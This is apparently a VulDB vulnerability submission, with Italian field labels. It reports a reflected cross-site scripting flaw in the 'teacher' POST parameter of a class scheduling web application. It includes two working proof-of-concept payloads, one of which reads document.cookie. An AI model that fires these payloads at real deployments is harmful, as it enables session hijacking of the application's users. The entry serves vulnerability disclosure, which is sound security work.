| Titolo | Class Scheduling System v1.0 /online_class_scheduling_system/search_teacher_result.php post parameter teacher exists reflected cross site scripting vulnerability |
|---|
| Descrizione | Class Scheduling System v1.0 has reflected cross site scripting vulnerability.
Vulnerability File: /online_class_scheduling_system/search_teacher_result.php
Parameter "teacher" (POST), exists reflected cross site scripting vulnerability
Payload1:teacher=--><script>alert(996)</script>&semester=2nd&sy=2012-2013&save=
Payload2:teacher=--><script>alert(document.cookie)</script>&semester=2nd&sy=2012-2013&save= |
|---|
| Fonte | ⚠️ https://github.com/joicygiore/ApplyForCVE/blob/main/XSS.md |
|---|
| Utente | joicygiore (UID 47243) |
|---|
| Sottomissione | 21/05/2023 06:27 (3 anni fa) |
|---|
| Moderazione | 21/05/2023 08:56 (2 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 229612 [SourceCodester Class Scheduling System 1.0 POST Parameter search_teacher_result.php teacher cross site scripting] |
|---|
| Punti | 20 |
|---|